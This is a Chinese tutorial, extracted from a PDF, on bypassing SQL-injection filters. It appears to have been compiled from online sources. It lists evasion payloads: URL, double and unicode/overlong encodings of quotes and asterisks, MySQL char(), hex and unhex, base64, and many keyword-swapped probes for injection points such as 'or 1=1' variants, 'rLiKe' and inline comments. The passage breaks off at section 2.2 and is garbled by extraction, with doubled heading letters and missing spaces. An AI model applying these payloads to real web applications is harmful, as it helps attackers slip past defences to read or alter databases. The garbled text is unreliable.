突破防注入的技巧突破防注入的技巧.pdfVIP

突破防注入的技巧 :Mramydnei :Mramydnei 作者::MMrraammyyddnneeii 空闲之余在国内外找了一些bypass防注入的代码，最后整理成了这个小文章。就像大牛 们说的一样木有银弹，所以没有哪个方法是万能的，具体问题还得具体分析。希望大牛们表 吐槽.具体的方法我觉得大概可以分为以下几种： 第一章 通过编码突破防注入 1.1URL 1.1URL 11..11UURRLL编码 对参数名进行URL 编码。示例代码: http://localhost/sqli.php?%69d=1and 7=7 对参数值进行URL 编码.示例代码: http://localhost/sqli.php?id=1%20%61%6E%64%20%31%3D%31 对参数值进行URL 双重编码: http://localhost/sqli.php?id=1%25%32%30%25%36%31%25%36%45%25%36%34 %25%32%30%25%33%31%25%33%44%25%33%31 单引号的一些编码: %u0027 %u02b9 %u02bc %u02c8 %u2032 %uff07 %c0%27 %c0%a7 %e0%80%a7 星号的一些编码: %u002a %uff0a %c0%2a %c0%aa %e0%80%aa 1.2 Mysql char : 1.2 Mysql char : 11..22 使用MMyyssqqll 内置函数cchhaarr（）。示例代码:: char(114)=r 1.3 Mysql HEX ,UNHEX(). 1.3 Mysql HEX ,UNHEX(). 11..33 使用MMyyssqqll 内置函数HHEEXX（）,,UUNNHHEEXX(())..示例代码： 通过str获取hex 值: selecthex(root) 返回结果:726F6F74 通过hex 获取str: selectunhex( 726F6F74) 返回结果: root 比如:当关键字root被过滤时可以用0x726F6F74代替root 1.4base64 1.4base64 11..44bbaassee6644变型注入： 对and 1=1 进行base64编码,得到结果:IGFuZCAxPTE= 1.5 mysql ascii(),ord() : 1.5 mysql ascii(),ord() : 11..55使用mmyyssqqll 内置函数aasscciiii(()),,oorrdd(())。示例代码:: ascii(r)=114 ord(r)=114 第二章 替换函数和关键字 2.1 2.1 22..11判断注入点的姿势 部分示例: id=1+OR+0x50=0x50 id=1+and+5!=6 And 0(false) And 1(true) /*!or*/1=1 or1=1;%00 and 1=1 2=2 or3=3 Xor4=4 Xor5 LIkE5 or6 rLiKe 6 ||32 37 AnD 1is null AnD 1is not null and 0having=0having and 1=1 2.2 2.2